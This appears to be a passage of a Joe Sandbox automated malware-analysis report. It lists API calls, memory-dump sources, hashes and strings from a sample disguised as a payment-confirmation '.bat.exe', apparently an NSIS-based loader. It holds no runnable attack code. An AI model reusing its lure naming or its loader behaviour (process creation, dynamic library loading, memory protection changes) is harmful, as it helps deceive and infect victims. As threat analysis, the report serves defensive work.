                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                            • Instruction ID: 6296e445ee025582091cb162a3efd7a4c9b40fecddc6e186669f82422f4bfe72
                                                            • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                            • Instruction Fuzzy Hash: 00E08C3221021AABDF10AE548C00EEB3B6CEB013A0F02447AFD16E3050D231E83097A9
                                                            APIs
                                                            • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035FA,00008001,00008001,004034FE,00414EF0,00004000,?,00000000,004033A8), ref: 00406209
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                            • Instruction ID: f029eba0d3a9f8ebddca737992f63761e7b4746d0aa70cfc26448402395c61e3
                                                            • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                            • Instruction Fuzzy Hash: 5DE08632154119EBCF106E908C00EEB379CEF15350F014876F921E7440D230E8328FA4
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(6E31505C,00000004,00000040,6E31504C), ref: 6E312A9D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true
                                                            • Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: ef72df8d4a49dd62481ace65d5a1d2c49d301827c9acb5e8c9ceabf48eddf8ce
                                                            • Instruction ID: 142177cdc1b4aacaedd7767fa65ac1e9b56a13bf4190a972eb03bc6536bd90c5
                                                            • Opcode Fuzzy Hash: ef72df8d4a49dd62481ace65d5a1d2c49d301827c9acb5e8c9ceabf48eddf8ce
                                                            • Instruction Fuzzy Hash: F3F0AEF0929A80FECB90CFE8C4467893BE8B70A305B2585EEE188DAA40E3344544DB91
                                                            APIs
                                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: PrivateProfileString
                                                            • String ID:
                                                            • API String ID: 1096422788-0
                                                            • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                            • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                            • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                            • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040657D,?,00421F28,?,?,Call,?,00000000), ref: 00406513
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Open
                                                            • String ID:
                                                            • API String ID: 71445658-0
                                                            • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                            • Instruction ID: 600eba3f25fec8fd2e0e76c9bf818d2d921b30b98e1649e5cb913c6f6c6f8cb9
                                                            • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                            • Instruction Fuzzy Hash: 4DD0123600020DBBDF115E90ED01FAB3B5DAB08714F014826FE06A4091D775D530AB59
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FB,?), ref: 0040360B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                            • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                            • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                            • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                            APIs
                                                            • CloseHandle.KERNELBASE(00000000), ref: 6E312C57
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true
                                                            • Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: ae4fbd98a1c8b6f3efca96e6b7e7063e8dc1f5a93261f67bfe51b13e7c43e457
                                                            • Instruction ID: e324842c8f55f60660453e5b26e5fab6bb9fac03987de5fa345aa17666e89610
                                                            • Opcode Fuzzy Hash: ae4fbd98a1c8b6f3efca96e6b7e7063e8dc1f5a93261f67bfe51b13e7c43e457
                                                            • Instruction Fuzzy Hash: 04416DB1908604AFDF189FE4DA86BD937BCEB47318F3088ADE905C7510DB399581EB91
                                                            APIs
                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                              • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,00421F28,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                              • Part of subcall function 00405707: lstrcatW.KERNEL32(00421F28,004030AD,004030AD,00421F28,00000000,00000000,00000000), ref: 00405762
                                                              • Part of subcall function 00405707: SetWindowTextW.USER32(00421F28,00421F28), ref: 00405774
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                              • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                              • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                              • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                              • Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
                                                              • Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54
                                                              • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                            • String ID:
                                                            • API String ID: 2972824698-0
                                                            • Opcode ID: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                            • Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
                                                            • Opcode Fuzzy Hash: 6849614f2a8bfbdd5acfcc5c7dc02bd50f0657ec5184be028ed3315e3fd21a51
                                                            • Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E
                                                            APIs
                                                            • GlobalAlloc.KERNELBASE(00000040,?,6E3112DB,?,6E31137F,00000019,6E3111CA,-000000A0), ref: 6E3112C5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true
                                                            • Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: AllocGlobal
                                                            • String ID:
                                                            • API String ID: 3761449716-0
                                                            • Opcode ID: 149508f7d0f4d213c616066472fbb1315439536c5bf82696d934cba4c01ec7b6
                                                            • Instruction ID: 162278ab59fdabd5c5363de6dd921f75d4590700bb86007502c92a6e4b487c7f
                                                            • Opcode Fuzzy Hash: 149508f7d0f4d213c616066472fbb1315439536c5bf82696d934cba4c01ec7b6
                                                            • Instruction Fuzzy Hash: 5DB012B0A00400AFEE00CB54DC0BF74325CF701304F24008CB600C2440C1204C00C624
                                                            APIs
                                                            • GetDlgItem.USER32(?,00000403), ref: 004058A4
                                                            • GetDlgItem.USER32(?,000003EE), ref: 004058B3
                                                            • GetClientRect.USER32(?,?), ref: 004058F0
                                                            • GetSystemMetrics.USER32(00000002), ref: 004058F7
                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405918
                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405929
                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040593C
                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040594A
                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040595D
                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040597F
                                                            • ShowWindow.USER32(?,00000008), ref: 00405993
                                                            • GetDlgItem.USER32(?,000003EC), ref: 004059B4
                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059C4
                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059DD
                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059E9
                                                            • GetDlgItem.USER32(?,000003F8), ref: 004058C2
                                                              • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,?,00404461), ref: 00404644
                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405A06
                                                            • CreateThread.KERNEL32(00000000,00000000,Function_000057DA,00000000), ref: 00405A14
                                                            • CloseHandle.KERNEL32(00000000), ref: 00405A1B
                                                            • ShowWindow.USER32(00000000), ref: 00405A3F
                                                            • ShowWindow.USER32(?,00000008), ref: 00405A44
                                                            • ShowWindow.USER32(00000008), ref: 00405A8E
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AC2
                                                            • CreatePopupMenu.USER32 ref: 00405AD3
                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AE7
                                                            • GetWindowRect.USER32(?,?), ref: 00405B07
                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B20
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B58
                                                            • OpenClipboard.USER32(00000000), ref: 00405B68
                                                            • EmptyClipboard.USER32 ref: 00405B6E
                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B7A
                                                            • GlobalLock.KERNEL32(00000000), ref: 00405B84
                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B98
                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405BB8
                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405BC3
                                                            • CloseClipboard.USER32 ref: 00405BC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                            • String ID: H/B${
                                                            • API String ID: 590372296-332483393
                                                            • Opcode ID: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                            • Instruction ID: 1bfd88ad0a039f30930ce625e3f17186fc56f4394c79b8c388f8475f2b475093
                                                            • Opcode Fuzzy Hash: d18a2026774e62a2c92573f4287a0ca8136519a3f9d5dde66db426fe6a39353e
                                                            • Instruction Fuzzy Hash: A7B127B1900608FFDB21AF60DD85DAE7B79FB44354F00413AFA41A61A0CB795E52DF68
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404B41
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00404B6B
                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404C27
                                                            • lstrcmpiW.KERNEL32(Call,00422F48,00000000,?,?), ref: 00404C59
                                                            • lstrcatW.KERNEL32(?,Call), ref: 00404C65
                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77
                                                              • Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9
                                                              • Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                              • Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                              • Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                              • Part of subcall function 00406930: CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                            • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,?,00420F18,?,?,000003FB,?), ref: 00404D3A
                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55
                                                              • Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                              • Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
                                                              • Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528192299.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528579506.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: A$C:\Users\user\eftermodnendes\ringeagt$Call$H/B$user32::EnumWindows(i r1 ,i 0)
                                                            • API String ID: 2624150263-2177096811
                                                            • Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                            • Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
                                                            • Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                            • Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D
                                                            APIs
                                                              • Part of subcall function 6E3112BB: GlobalAlloc.KERNELBASE(00000040,?,6E3112DB,?,6E31137F,00000019,6E3111CA,-000000A0), ref: 6E3112C5
                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6E311D2D
                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 6E311D75
                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 6E311D7F
                                                            • GlobalFree.KERNEL32(00000000), ref: 6E311D92
                                                            • GlobalFree.KERNEL32(?), ref: 6E311E74
                                                            • GlobalFree.KERNEL32(?), ref: 6E311E79
                                                            • GlobalFree.KERNEL32(?), ref: 6E311E7E
                                                            • GlobalFree.KERNEL32(00000000), ref: 6E312068
                                                            • lstrcpyW.KERNEL32(?,?), ref: 6E312222
                                                            • GetModuleHandleW.KERNEL32(00000008), ref: 6E3122A1
                                                            • LoadLibraryW.KERNEL32(00000008), ref: 6E3122B2
                                                            • GetProcAddress.KERNEL32(?,?), ref: 6E31230C
                                                            • lstrlenW.KERNEL32(00000808), ref: 6E312326
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3573405081.000000006E311000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E310000, based on PE: true
                                                            • Associated: 00000000.00000002.3573385773.000000006E310000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573419200.000000006E314000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.3573433511.000000006E316000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e310000_inward_payment_confirmation_reference_Z1766053541_notifications.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                            • String ID:
                                                            • API String ID: 245916457-0
                                                            • Opcode ID: 6c1bc62f1dcadd6ff3ea6132bd61c3f67f25e4e1a32e01df95aa3932b5f24b07
                                                            • Instruction ID: c9d47fb5e6c88b78a0e51b1a33578622266347f14e1fca2d5fb757c277e7858b
                                                            • Opcode Fuzzy Hash: 6c1bc62f1dcadd6ff3ea6132bd61c3f67f25e4e1a32e01df95aa3932b5f24b07
                                                            • Instruction Fuzzy Hash: 9A22CB71D1C60ADECB58CFE9C5806EEB7F8FB1A305F10462ED1A5A3280D7719989DB60
                                                            APIs
                                                            • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                            Strings
                                                            • C:\Users\user\eftermodnendes\ringeagt\Afviklingsforlbet, xrefs: 0040226E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.3528119336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.3528085443.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.3528162333.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
